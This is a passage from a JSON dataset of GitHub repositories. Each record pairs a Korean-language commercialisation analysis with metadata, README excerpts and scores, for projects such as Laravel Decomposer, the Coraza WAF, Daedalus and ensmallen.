보물인가\n복잡한 웹 애플리케이션의 구조를 자동으로 분석하고 시각화하는 도구로, 기술팀이 코드를 더 빠르게 이해하고 유지보수할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **개발사 내부 도구 SaaS**: 클라이언트 프로젝트의 코드 품질 진단 및 보고서 자동 생성 서비스\n2. **API 기","readme_excerpt":"<p align=\"center\"><img src=\"/.github/laravel-decomposer-logo.svg\"></p>\n<p align=\"center\">\n<a href=\"https://packagist.org/packages/lubusin/laravel-decomposer\"><img src=\"https://img.shields.io/packagist/v/lubusIN/laravel-decomposer\" alt=\"Latest Stable Version\"></a>\n<a href=\"https://packagist.org/packages/lubusin/laravel-decomposer\"><img src=\"https://img.shields.io/packagist/stars/lubusIN/laravel-decomposer\" alt=\"Total Stars\"></a>\n<a href=\"https://packagist.org/packages/lubusin/laravel-decomposer\"><img src=\"https://img.shields.io/packagist/dt/lubusIN/laravel-decomposer\" alt=\"Total Downloads\"></a>\n<a href=\"https://github.com/lubusin/laravel-decomposer/blob/master/LICENSE.txt\"><img src=\"https://img.shields.io/github/license/lubusIN/laravel-decomposer\" alt=\"License\"></a>\n</p>\n\n![Laravel Decomposer](/.github/laravel-decomposer.jpg)\n\n## Overview\n\nLaravel Decomposer decomposes and lists all the installed packages and their dependencies along with the Laravel & the Server environment details you","composite_score":0.0142,"license_safety_tag":"safe"},{"name":"cisagov/bad-practices","github_url":"https://github.com/cisagov/bad-practices","stars":12,"language":"Shell","license":"CC0-1.0","abandonment_months":1,"description":"# cisagov/bad-practices 분석 보고서\n\n## 왜 보물인가\n미국 정부 사이버보안청이 만든 '하지 말아야 할 나쁜 코딩 사례 모음'으로, 보안 위험을 피하려는 모든 조직에게 무료로 배울 수 있는 공식 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 교육 플랫폼**: 개발자 교육용 SaaS에 내용을 통합하여 월 구독 고객에게 제공\n2","readme_excerpt":"# 👋 Welcome to CISA's Bad Practices Catalog #\n\n[![GitHub Build Status](https://github.com/cisagov/bad-practices/workflows/build/badge.svg)](https://github.com/cisagov/bad-practices/actions)\n[![License](https://img.shields.io/github/license/cisagov/bad-practices)](https://spdx.org/licenses/)\n[![CodeQL](https://github.com/cisagov/bad-practices/workflows/CodeQL/badge.svg)](https://github.com/cisagov/bad-practices/actions/workflows/codeql-analysis.yml)\n\n<div align=\"center\">\n<img alt=\"Banner\" width=\"460\" src=\"assets/banner.png\">\n</div>\n\nWe’re using [GitHub\ndiscussions](https://github.com/cisagov/bad-practices/discussions) as a place to\nconnect and engage in a critical conversations with other members in the\ncommunity. We hope that you will:\n\n- Ask questions if something doesn't make sense.\n- Share your thoughts on existing, and ideas for future, bad practice entries.\n- Engage with us and other community members on ideas and actions to eradicate\n  bad practices.\n- Welcome others and maintain","composite_score":0.0141,"license_safety_tag":"unknown"},{"name":"jptosso/coraza-waf","github_url":"https://github.com/jptosso/coraza-waf","stars":20,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# coraza-waf 상용화 분석\n\n## 왜 보물인가\n웹 애플리케이션을 해킹 공격으로부터 보호하는 보안 방어막으로, 온라인 서비스를 운영하는 모든 기업에게 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 보안 게이트웨이**: 중소 기업의 웹사이트를 공격으로부터 보호하는 구독형 방어 서비스\n2. **API 보안 중간 검사소**: 개발자들이","readme_excerpt":"<h1>\n  <img src=\"https://coraza.io/images/logo_shield_only.png\" align=\"left\" height=\"46px\" alt=\"\"/>&nbsp;\n  <span>Coraza - Web Application Firewall</span>\n</h1>\n\n[![Regression Tests](https://github.com/corazawaf/coraza/actions/workflows/regression.yml/badge.svg)](https://github.com/corazawaf/coraza/actions/workflows/regression.yml)\n[![Coreruleset Compatibility](https://img.shields.io/badge/Coreruleset%20Compatibility-100%25-brightgreen)](#)\n[![CodeQL](https://github.com/corazawaf/coraza/actions/workflows/codeql-analysis.yml/badge.svg)](https://github.com/corazawaf/coraza/actions/workflows/codeql-analysis.yml)\n[![codecov](https://codecov.io/gh/corazawaf/coraza/branch/main/graph/badge.svg?token=6570804ZC7)](https://codecov.io/gh/corazawaf/coraza)\n[![Project Status: Active – The project has reached a stable, usable state and is being actively developed.](https://www.repostatus.org/badges/latest/active.svg)](https://www.repostatus.org/#active)\n[![OWASP Production Project](https://img.shiel","composite_score":0.014,"license_safety_tag":"safe"},{"name":"cheatsheet1999/FrontEndCollection","github_url":"https://github.com/cheatsheet1999/FrontEndCollection","stars":9,"language":"Go","license":"unknown","abandonment_months":0,"description":"# FrontEndCollection 평가 분석\n\n## 왜 보물인가\n웹사이트를 만드는 개발자들이 자주 사용하는 코드 팁과 기술들을 한곳에 모아놓은 참고서입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 플랫폼**: 웹 개발 입문자를 위한 온라인 강의나 튜토리얼 서비스로 패키징\n2. **기업 개발팀 내부 도구**: 회사의 모든 개발자가 공통으로 참고할","readme_excerpt":"# CloudCollection 📚\n\nA comprehensive collection of algorithm solutions, system design materials, and modern C++ tutorials. Perfect for interview preparation, learning, and reference.\n\n---\n\n## 🧮 Data Structures & Algorithms\n\nOrganized by topic and difficulty level, with detailed solutions and explanations.\n\n### 📊 Array & Two Pointers\n\n[0001. Two Sum](/Data%20Structure%20and%20Algorithms/LeetCode/0001.%20Two%20Sum.md)  \n[0011. Container With Most Water](/Data%20Structure%20and%20Algorithms/LeetCode/0011.%20Container%20With%20Most%20Water.md)  \n[0015. 3Sum](/Data%20Structure%20and%20Algorithms/LeetCode/0015.%203Sum.md)  \n[0016. 3Sum Closest](/Data%20Structure%20and%20Algorithms/LeetCode/0016.%203Sum%20Closest.md)  \n[0018. 4Sum](/Data%20Structure%20and%20Algorithms/LeetCode/0018.%204Sum.md)  \n[0027. Remove Element](/Data%20Structure%20and%20Algorithms/LeetCode/0027.%20Remove%20Element.md)  \n[0031. Next Permutation](/Data%20Structure%20and%20Algorithms/LeetCode/0031.%20Next%20Permutation.md","composite_score":0.014,"license_safety_tag":"unknown"},{"name":"seek-oss/vanilla-extract","github_url":"https://github.com/seek-oss/vanilla-extract","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# Vanilla Extract 저장소 분석\n\n## 왜 보물인가\n웹사이트의 스타일을 효율적으로 관리하고 성능을 높이는 개발 도구로, 현대적인 웹 서비스 개발에 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n- **디자인 시스템 SaaS**: 대규모 기업의 디자인 팀이 일관된 브랜드 스타일을 관리하는 웹 기반 도구\n- **웹 개발 플랫폼**: 노코드/로우코","readme_excerpt":"# 🧁 vanilla-extract\n\n**Zero-runtime Stylesheets-in-TypeScript.**\n\nWrite your styles in TypeScript (or JavaScript) with locally scoped class names and CSS Variables, then generate static CSS files at build time.\n\nBasically, it’s [“CSS Modules](https://github.com/css-modules/css-modules)-in-TypeScript” but with scoped CSS Variables + heaps more.\n\n🔥 &nbsp; All styles generated at build time — just like [Sass](https://sass-lang.com), [Less](http://lesscss.org), etc.\n\n✨ &nbsp; Minimal abstraction over standard CSS.\n\n🦄 &nbsp; Works with any front-end framework — or even without one.\n\n🌳 &nbsp; Locally scoped class names — just like [CSS Modules.](https://github.com/css-modules/css-modules)\n\n🚀 &nbsp; Locally scoped [CSS Variables](https://developer.mozilla.org/en-US/docs/Web/CSS/Using_CSS_custom_properties), `@keyframes` and `@font-face` rules.\n\n🎨 &nbsp; High-level theme system with support for simultaneous themes. No globals!\n\n🛠 &nbsp; Utils for generating variable-based `calc` expressions.\n\n","composite_score":0.0139,"license_safety_tag":"safe"},{"name":"zhaojun1998/zfile-vue","github_url":"https://github.com/zhaojun1998/zfile-vue","stars":6,"language":"Vue","license":"unknown","abandonment_months":0,"description":"# zhaojun1998/zfile-vue 분석\n\n## 왜 보물인가\n파일 저장소를 웹 브라우저에서 간편하게 관리할 수 있는 작은 도구로, 기술이 없어도 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 회사들을 위한 \"클라우드 파일 관리 시스템\" 구독 서비스로 판매\n2. **내부 업무 도구**: 대기업의 문서 보관소나 팀","readme_excerpt":"# Z-File\n\n此项目是一个在线文件目录的程序, 支持各种对象存储和本地存储, 使用定位是个人放常用工具下载, 或做公共的文件库. 不会向多账户方向开发.\n\n预览地址: [http://zfile.vip](http://zfile.vip)\n后端代码: [https://github.com/zhaojun1998/zfile](https://github.com/zhaojun1998/zfile)\n\n## 访问地址\n\n用户前台: http://127.0.0.1:8080/main\n\n初始安装: http://127.0.0.1:8080/install\n\n管理后台: http://127.0.0.1:8080/admin\n","composite_score":0.0139,"license_safety_tag":"unknown"},{"name":"symfony/http-foundation","github_url":"https://github.com/symfony/http-foundation","stars":11,"language":"PHP","license":"mit","abandonment_months":0,"description":"# Symfony HTTP Foundation 분석 보고서\n\n## 왜 보물인가\n웹 서비스에서 사용자의 요청과 응답을 안전하고 효율적으로 처리하는 핵심 도구로, 전 세계 수많은 웹사이트의 기반이 되고 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 데이터를 받아 처리하고 결과를 돌려주는 클라우드 기반 소프트웨어 개발 시 안정적인 통신 ","readme_excerpt":"HttpFoundation Component\n========================\n\nThe HttpFoundation component defines an object-oriented layer for the HTTP\nspecification.\n\nResources\n---------\n\n * [Documentation](https://symfony.com/doc/current/components/http_foundation.html)\n * [Contributing](https://symfony.com/doc/current/contributing/index.html)\n * [Report issues](https://github.com/symfony/symfony/issues) and\n   [send Pull Requests](https://github.com/symfony/symfony/pulls)\n   in the [main Symfony repository](https://github.com/symfony/symfony)\n","composite_score":0.0137,"license_safety_tag":"safe"},{"name":"awslabs/aws-icons-for-plantuml","github_url":"https://github.com/awslabs/aws-icons-for-plantuml","stars":6,"language":"Python","license":"NOASSERTION","abandonment_months":1,"description":"# AWS Icons for PlantUML 분석\n\n## 왜 보물인가\nAWS 클라우드 서비스를 이용한 시스템 설계도를 그릴 때 필요한 공식 아이콘 모음으로, 전문가처럼 보이는 문서를 쉽게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 아키텍처 설계 SaaS**: 기업들이 AWS 인프라를 시각적으로 설계하고 팀과 공유하는 웹 플랫폼\n2. *","readme_excerpt":"<!--\nCopyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.\nSPDX-License-Identifier: MIT (For details, see https://github.com/awslabs/aws-plantuml-icons/blob/main/LICENSE)\n-->\n\n# AWS Icons for PlantUML\n\nPlantUML images, sprites, macros, and other includes for Amazon Web Services (AWS) services and resources. Used to create PlantUML diagrams with AWS components. All elements are generated from the official [AWS Architecture Icons](https://aws.amazon.com/architecture/icons/) and when combined with [PlantUML](http://plantuml.com/) and the [C4 model](https://c4model.com/), are a great way to communicate your design, deployment, and topology as code.\n\nBesides usage as custom sprites on PlantUML components, different types of diagrams can quickly and easily be created with the icons (including experimental support for \"dark mode\").\n\n## Table of Contents\n\n<!-- toc -->\n\n- [Getting Started](#getting-started)\n  - [Hello World](#hello-world)\n- [Examples](#examples)\n  - [Basic Usa","composite_score":0.0136,"license_safety_tag":"unknown"},{"name":"boringdesigners/boring-avatars","github_url":"https://github.com/boringdesigners/boring-avatars","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":1,"description":"# Boring Avatars 상용화 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자마다 다른 프로필 사진을 자동으로 만들어주는 도구로, 어떤 서비스든 쉽게 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n협업 도구나 커뮤니티 플랫폼에서 회원가입 시 자동으로 고유한 프로필 사진을 생성해 사용자 경험을 높일 수 있습니다.\n\n*","readme_excerpt":"# Boring avatars\n\nBoring avatars is a tiny JavaScript React library that generates custom, SVG-based avatars from any username and color palette.\n<a href=\"https://www.npmjs.com/package/boring-avatars\">\n\n![hi](https://badgen.net/npm/v/boring-avatars)\n\n</a>\n\n## Install\n\n```\nnpm install boring-avatars\n```\n\n## Usage\n\n```jsx\nimport Avatar from 'boring-avatars';\n\n<Avatar name=\"Maria Mitchell\" />;\n```\n\n### Props\n\n| Prop    | Type                                                         | Default                                                   |\n|---------|--------------------------------------------------------------|-----------------------------------------------------------|\n| size    | number or string                                             | `40px`                                                    |\n| square  | boolean                                                      | `false`                                                   |\n| title   | boolean                               ","composite_score":0.0134,"license_safety_tag":"safe"},{"name":"LibrePCB/LibrePCB","github_url":"https://github.com/LibrePCB/LibrePCB","stars":17,"language":"C++","license":"gpl-3.0","abandonment_months":0,"description":"","readme_excerpt":"# LibrePCB\n\n[![Become a Patron](https://img.shields.io/badge/Patreon-donate-orange.svg)](https://www.patreon.com/librepcb)\n[![Discourse](https://img.shields.io/badge/Discourse-discuss-blueviolet.svg)](https://librepcb.discourse.group/)\n[![Matrix](https://img.shields.io/badge/Matrix-chat-blue.svg)](https://matrix.to/#/#librepcb:matrix.org)\n[![Website](https://img.shields.io/badge/Website-librepcb.org-29d682.svg)](https://librepcb.org/)\n[![Docs](https://img.shields.io/badge/Docs-read-yellow.svg)](https://librepcb.org/docs/)\n\n[![Github Actions](https://github.com/LibrePCB/LibrePCB/actions/workflows/main.yml/badge.svg)](https://github.com/LibrePCB/LibrePCB/actions)\n[![OpenSSF Best Practices](https://bestpractices.coreinfrastructure.org/projects/1652/badge)](https://bestpractices.coreinfrastructure.org/projects/1652)\n\n[![Packaging status](https://repology.org/badge/vertical-allrepos/librepcb.svg?columns=3&header=LibrePCB)](https://repology.org/project/librepcb/versions)\n\n## About LibrePCB\n\n","composite_score":0.0134,"license_safety_tag":"restricted"},{"name":"vuejs/devtools","github_url":"https://github.com/vuejs/devtools","stars":14,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# Vue.js DevTools 프로젝트 분석\n\n## 왜 보물인가\nVue.js 개발자들이 웹 애플리케이션을 만들 때 버그를 찾고 성능을 개선하도록 돕는 필수 진단 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: Vue.js 개발 환경을 제공하는 클라우드 개발 플랫폼에 번들로 포함\n2. **내부 업무 도구**: 소프트웨어 회사의 개발팀이","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://github.com/vuejs/devtools\">\n    <img src=\"https://raw.githubusercontent.com/vuejs/devtools/main/docs/public/logo.svg\" alt=\"Vue DevTools - Unleash Vue Developer Experience\" width=\"200\">\n  </a>\n  <br>\n  <h1 align=\"center\">Vue DevTools</h1>\n  <p align=\"center\">Unleash Vue Developer Experience</p>\n</p>\n\n> Note: this repository is for Vue Devtools v7 (previously known as Vue Devtools Next). The now legacy v6 version has been moved to [vuejs/devtools-v6](https://github.com/vuejs/devtools-v6).\n\n## Getting Started\n\n- [Install as Vite plugin](https://devtools.vuejs.org/guide/vite-plugin)\n- [Standalone App](https://devtools.vuejs.org/guide/standalone)\n- [Chrome Extension](https://devtools.vuejs.org/guide/browser-extension)\n- [Firefox Extension](https://devtools.vuejs.org/guide/browser-extension#firefox)\n\nFor more details, check out the documentation at [devtools.vuejs.org](https://devtools.vuejs.org).\n\n## Sponsors\n\n<p align=\"center\">\n  <a href=\"https://githu","composite_score":0.0133,"license_safety_tag":"safe"},{"name":"nuxt/modules","github_url":"https://github.com/nuxt/modules","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# Nuxt/Modules 저장소 분석\n\n## 왜 보물인가\n웹사이트를 만드는 과정을 훨씬 간단하고 빠르게 해주는 도구 모음으로, 개발자들이 반복적인 작업을 줄이고 더 창의적인 일에 집중할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 빠른 웹 애플리케이션 개발이 필요한 스타트업들이 제품을 빨리 시장에 출시하기 위해 활용\n2. ","readme_excerpt":"[![Explore Nuxt Modules to build Vue applications](https://user-images.githubusercontent.com/904724/210616249-25aec46e-ab06-4b4d-9154-10b02546d558.jpg)](https://nuxt.com/modules)\n\n# Nuxt Modules\n\n[![npm version][npm-version-src]][npm-version-href]\n[![Nuxt][nuxt-src]][nuxt-href]\n[![Volta][volta-src]][volta-href]\n\n> Discover the Nuxt modules to add any CMS, Database, UI, Auth and integrations into your Vue application.\n\n- 🔗 [Modules listing](https://nuxt.com/modules)\n- 📖 [Module author guide](https://nuxt.com/docs/guide/going-further/modules)\n\n## Modules Database\n\nMetadata of nuxt modules are maintained in [yml](https://en.wikipedia.org/wiki/YAML) files inside [./modules](./modules) directory and automatically synced from upstream to fetch latest information.\n\n### Add/Update a module\n\n```bash\npnpm sync <name> <repo>\n```\n\nExample: `pnpm sync tailwindcss nuxt-modules/tailwindcss`\n\nTo sync with a branch different than `main`, suffix the repo with `#repo-branch`, example: `pnpm sync tailwind","composite_score":0.0133,"license_safety_tag":"safe"},{"name":"zeit/styled-jsx","github_url":"https://github.com/zeit/styled-jsx","stars":7,"language":"JavaScript","license":"mit","abandonment_months":0,"description":"# styled-jsx 상업화 분석\n\n## 왜 보물인가\n웹사이트의 디자인을 효율적으로 관리할 수 있는 핵심 기술로, 개발 생산성을 크게 향상시켜 시간과 비용을 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 웹 기반 홈페이지 빌더 SaaS**\n사용자가 코딩 없이 웹사이트를 만들 수 있는 플랫폼에서 디자인 처리 엔진으로 활용하여 월 $29~99 구","readme_excerpt":"# styled-jsx\n\n[![build status](https://github.com/vercel/styled-jsx/actions/workflows/main.yml/badge.svg?branch=main)](https://github.com/vercel/styled-jsx/actions?query=branch%3Amain)\n\nFull, scoped and component-friendly CSS support for JSX (rendered on the server or the client).\n\nCode and docs are for v3 which we highly recommend you to try. Looking for styled-jsx v2? Switch to the [v2 branch](https://github.com/vercel/styled-jsx/tree/v2).\n\n- [Getting started](#getting-started)\n- [Configuration options](#configuration-options)\n  - [`optimizeForSpeed`](#optimizeforspeed)\n  - [`sourceMaps`](#sourcemaps)\n  - [`styleModule`](#stylemodule)\n  - [`vendorPrefixes`](#vendorprefixes)\n- [Features](#features)\n- [How It Works](#how-it-works)\n  - [Why It Works Like This](#why-it-works-like-this)\n- [Targeting The Root](#targeting-the-root)\n- [Global styles](#global-styles)\n  - [One-off global selectors](#one-off-global-selectors)\n- [Dynamic styles](#dynamic-styles)\n  - [Via interpolated dynamic pro","composite_score":0.0133,"license_safety_tag":"safe"},{"name":"dotnet/format","github_url":"https://github.com/dotnet/format","stars":6,"language":"","license":"unknown","abandonment_months":1,"description":"# dotnet/format 분석 보고서\n\n## 왜 보물인가\n프로그래머들이 작성한 코드를 자동으로 정리해주는 도구로, 개발 생산성을 크게 향상시킬 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발사 내부 도구**: 소프트웨어 개발회사의 코드 검수 자동화 시스템으로 통합하여 품질 관리 비용 절감\n2. **SaaS 코드 정리 서비스**: 클라우드","readme_excerpt":"## Repository Consolidation\n\nGoing forward, the .NET SDK team is using the [dotnet/sdk](https://github.com/dotnet/sdk) repository for further development and respond to issues formerly in this repository.\n\nFor finding the latest installers table and other installation information, see the [Installing the SDK](https://github.com/dotnet/sdk#installing-the-sdk) section in that repository's readme.\n","composite_score":0.0132,"license_safety_tag":"unknown"},{"name":"mocklets/pluto","github_url":"https://github.com/mocklets/pluto","stars":11,"language":"Kotlin","license":"Apache-2.0","abandonment_months":1,"description":"# Pluto 저장소 분석 보고서\n\n## 왜 보물인가\n모의 데이터를 자동으로 만들어주는 도구로, 개발자들이 실제 고객 데이터 없이도 소프트웨어를 테스트할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 회사 관리 소프트웨어 업체가 고객에게 더 빠르게 테스트 환경을 제공하는 데 활용\n2. **내부 업무 도구**: 은행이나 보험사가","readme_excerpt":"# Android Pluto\n\n![Maven Central Version](https://img.shields.io/maven-central/v/com.androidpluto/pluto)\n[![CLA assistant](https://cla-assistant.io/readme/badge/androidPluto/pluto)](https://cla-assistant.io/androidPluto/pluto)\n[![Daily Builds](https://github.com/androidPluto/pluto/actions/workflows/daily_builds.yml/badge.svg)](https://github.com/androidPluto/pluto/actions/workflows/daily_builds.yml)\n\nPluto is an on-device debugging framework for Android applications, which helps in the inspection of HTTP requests/responses, captures Crashes, and ANRs, and manipulates application data on the go.\n\nIt comes with a UI to monitor and share the information, as well as APIs to access and use that information in your application.\n\n<br>\n\n## 🖇 &nbsp;Integrate Pluto in your application\n\n\n\n### Add Gradle Dependencies\n\nPluto is distributed through [***mavenCentral***](https://central.sonatype.com/artifact/com.androidpluto/pluto). To use it, you need to add the following Gradle dependency to your bu","composite_score":0.0131,"license_safety_tag":"safe"},{"name":"input-output-hk/daedalus","github_url":"https://github.com/input-output-hk/daedalus","stars":6,"language":"TypeScript","license":"apache-2.0","abandonment_months":0,"description":"# Daedalus 저장소 분석\n\n## 왜 보물인가\n블록체인 지갑 기술로, 암호화폐 거래와 자산 관리를 안전하게 처리하는 핵심 소프트웨어입니다.\n\n## 어디에 쓸 수 있나\n\n1. **암호화폐 거래소 SaaS**: 개인 투자자들이 안전하게 자산을 관리하고 거래할 수 있는 웹 서비스로 운영\n2. **기관 자산관리 도구**: 금융회사나 기금에서 대규모 암호화폐 ","readme_excerpt":"<blockquote>\n<sub>Document maintainer: Daniel Main<br/>Document status: Active</sub>\n</blockquote>\n\n# Daedalus\n[![Build status](https://badge.buildkite.com/e173494257519752d79bb52c7859df6277c6d759b217b68384.svg?branch=master)](https://buildkite.com/input-output-hk/daedalus)\n[![Release](https://img.shields.io/github/release/input-output-hk/daedalus.svg)](https://github.com/input-output-hk/daedalus/releases)\n[![License](https://img.shields.io/github/license/input-output-hk/daedalus)](https://github.com/input-output-hk/daedalus/blob/develop/LICENSE)\n\nDaedalus - Cryptocurrency Wallet\n\n## Setup development environment\n\n### Linux/macOS\n\n#### Yarn\n\n[Yarn](https://yarnpkg.com/lang/en/docs/install) is required to install `npm` dependencies to build Daedalus.\n\n#### Nix\n\n[Nix](https://nixos.org/nix/) is needed to run Daedalus in `nix develop` shell.\n\n1. Install upstream nix using [Determinate Nix Installer](https://github.com/DeterminateSystems/nix-installer)\n   ```\n   $ curl -fsSL https://instal","composite_score":0.0131,"license_safety_tag":"safe"},{"name":"JetBrains/skiko","github_url":"https://github.com/JetBrains/skiko","stars":16,"language":"Kotlin","license":"Apache-2.0","abandonment_months":1,"description":"# JetBrains/skiko 분석 보고서\n\n## 왜 보물인가\nJetBrains(유명한 개발 도구 회사)가 만든 그래픽 렌더링 기술로, 다양한 기기에서 동일한 화면 표현을 가능하게 합니다.\n\n## 어디에 쓸 수 있나\n1. **디자인 협업 SaaS**: 팀이 함께 그림을 그리고 편집하는 클라우드 기반 도구 (Figma 경쟁)\n2. **개발사 내부 도구**:","readme_excerpt":"[![official project](http://jb.gg/badges/official.svg)](https://confluence.jetbrains.com/display/ALL/JetBrains+on+GitHub)\n[![version](https://img.shields.io/badge/dynamic/json.svg?color=orange&label=latest%20version&query=%24.tag_name&url=https%3A%2F%2Fgithub.com%2FJetBrains%2Fskiko%2Freleases%2Flatest)](https://github.com/JetBrains/skiko/releases/latest)\n# Kotlin Multiplatform library for Skia and window management #\n\nSkiko (short for Skia for Kotlin) is the graphical library exposing significant part\nof [Skia library](https://skia.org) APIs to Kotlin, along with the gluing code for rendering context.\n\nSupported platforms:\n   * Kotlin/JVM on Linux(x86_64 and arm64)\n   * Kotlin/JVM on Windows(x86_64)\n   * Kotlin/JVM on macOS(x86_64 and arm64)\n   * Kotlin/JVM on Android(x86_64 and arm64), starting with API version 24\n   * Kotlin/JS + WebAssembly in browsers\n   * Kotlin/Native on iOS(arm64 and x64)\n   * Kotlin/Native on macOS (arm64 and x64)\n\n## API documentation\n\n See autogenerated API ","composite_score":0.013,"license_safety_tag":"safe"},{"name":"pingcap/tidb-dev-guide","github_url":"https://github.com/pingcap/tidb-dev-guide","stars":5,"language":"","license":"unknown","abandonment_months":1,"description":"# TiDB 개발 가이드 저장소 분석\n\n## 왜 보물인가\n데이터베이스 개발 표준을 정리한 공식 가이드로, 대규모 데이터를 다루는 기업들이 안정적인 시스템을 구축할 때 참고할 수 있는 검증된 지식이 담겨 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 데이터 관리 플랫폼**: 고객 데이터를 안전하게 저장·처리하는 클라우드 서비스 구축\n2. **내부 업","readme_excerpt":"# TiDB Development Guide\n\nThis repository contains the source of TiDB Development Guide.\n\n* The target audience of this guide is TiDB contributors, both new and experienced.\n* The objective of this guide is to help contributors become an expert of TiDB, who is familiar with its design and implementation and thus is able to use it fluently in the real world as well as develop TiDB itself deeply.\n\n## Requirements\n\nBuilding the book requires [mdBook](https://github.com/rust-lang-nursery/mdBook). To get it:\n\n```bash\n$ cargo install mdbook\n```\n\n## Building\n\nTo build the book, type:\n\n```bash\n$ mdbook build\n```\n\nThe output will be in the `book` subdirectory. To check it out, open it in\nyour web browser.\n\n_Firefox:_\n```bash\n$ firefox book/html/index.html                       # Linux\n$ open -a \"Firefox\" book/html/index.html             # OS X\n$ Start-Process \"firefox.exe\" .\\book\\html\\index.html # Windows (PowerShell)\n$ start firefox.exe .\\book\\html\\index.html           # Windows (Cmd)\n```\n\n_Ch","composite_score":0.0129,"license_safety_tag":"unknown"},{"name":"asvetliakov/vscode-neovim","github_url":"https://github.com/asvetliakov/vscode-neovim","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# vscode-neovim 상품화 분석\n\n## 왜 보물인가\n프로그래머들이 선호하는 두 가지 편집 도구를 결합하여, 작업 효율을 크게 높일 수 있는 개발자 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발자 생산성 SaaS**: 원격 개발 환경에서 고급 편집 기능을 제공하는 클라우드 IDE 서비스\n2. **기업 개발팀 내부 도구**: 대규모 소프트웨어","readme_excerpt":"# VSCode Neovim\n\n<p align=\"center\"><img src=\"./images/icon.png\" height=\"128\"><br>VSCode Neovim Integration</p>\n\n<p align=center>\n<a href=\"https://marketplace.visualstudio.com/items?itemName=asvetliakov.vscode-neovim\"><img src=\"https://img.shields.io/visual-studio-marketplace/v/asvetliakov.vscode-neovim?color=%234c1&label=Visual%20Studio%20Marketplace\"></a>\n<a href=\"https://github.com/asvetliakov/vscode-neovim/actions/workflows/build_test.yml\"><img src=\"https://github.com/asvetliakov/vscode-neovim/workflows/Code%20Check%20&%20Test/badge.svg\"></a>\n<a href=\"https://gitter.im/vscode-neovim/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge\"><img src=\"https://badges.gitter.im/vscode-neovim/community.svg\"></a>\n</p>\n\n[Neovim](https://neovim.io/) is a fork of Vim to allow greater extensibility and integration. This extension uses a\nfully embedded Neovim instance, no more half-complete Vim emulation! VSCode's native functionality is used for insert\nmode and VSCode commands, makin","composite_score":0.0127,"license_safety_tag":"safe"},{"name":"mlpack/ensmallen","github_url":"https://github.com/mlpack/ensmallen","stars":5,"language":"C++","license":"NOASSERTION","abandonment_months":1,"description":"# mlpack/ensmallen 분석\n\n## 왜 보물인가\n기계학습 모델을 더 빠르고 효율적으로 학습시키는 수학적 알고리즘 모음으로, 인공지능 개발의 핵심 부품입니다.\n\n## 어디에 쓸 수 있나\n\n1. **이미지 인식 SaaS**: 사진에서 물체를 자동으로 찾아내는 서비스에서 인식 정확도를 높이는 데 활용\n2. **기업 데이터 분석 도구**: 대량의 판매/","readme_excerpt":"<h2 align=\"center\">\n  <a href=\"http://ensmallen.org/\"><img src=\"http://ensmallen.org/img/ensmallen_text.svg\" style=\"background-color:rgba(0,0,0,0);\" height=230 alt=\"ensmallen: a C++ header-only library for numerical optimization\"></a>\n</h2>\n\n**ensmallen** is a high-quality C++ library for non-linear numerical optimization.\n\nensmallen provides many types of optimizers that can be used\nfor virtually any numerical optimization task.\nThis includes gradient descent techniques, gradient-free optimizers,\nand constrained optimization.\nExamples include L-BFGS, SGD, CMAES and Simulated Annealing.\nensmallen also allows optional callbacks to customize the optimization process.\n\nDocumentation and downloads: https://ensmallen.org\n\n### Requirements\n\n* C++ compiler with C++14 support\n* Armadillo (https://arma.sourceforge.net), version 10.8.2 or later\n* OpenBLAS or Intel MKL or LAPACK (see Armadillo site for details)\n\n\n### Installation\n\nensmallen can be installed in several ways: either manually or via","composite_score":0.0125,"license_safety_tag":"unknown"},{"name":"SergeyTeplyakov/ObjectLayoutInspector","github_url":"https://github.com/SergeyTeplyakov/ObjectLayoutInspector","stars":8,"language":"C#","license":"mit","abandonment_months":1,"description":"# ObjectLayoutInspector 평가 보고서\n\n## 왜 보물인가\n컴퓨터 프로그램이 메모리를 어떻게 사용하는지 눈으로 볼 수 있게 해주는 도구로, 프로그램 성능을 개선하려는 개발자들에게 유용합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소프트웨어 개발사들이 자신의 제품 성능을 분석하고 최적화하는 웹 기반 진단 플랫폼\n2. **","readme_excerpt":"# ObjectLayoutInspector (Getting an instance layout at runtime)\n\n[![GitHub](https://img.shields.io/github/license/SergeyTeplyakov/ObjectLayoutInspector)](LICENSE) [![Nuget](https://img.shields.io/nuget/v/ObjectLayoutInspector)](https://www.nuget.org/packages/ObjectLayoutInspector/)\n\n![Demo](images/FieldsLayout_Figure1.gif \"Demo\")\n\n> **Note:** All layout examples and sizes shown in this document assume x64 (64-bit) runtime. The library currently targets x64 only — results on x86 are not supported.\n\n## Getting Started\n\nInstall the NuGet package:\n\n```\ndotnet add package ObjectLayoutInspector\n```\n\nPrint the layout of any type:\n\n```csharp\nusing ObjectLayoutInspector;\n\n// Print the layout to the console\nTypeLayout.PrintLayout<YourType>();\n\n// Or get the 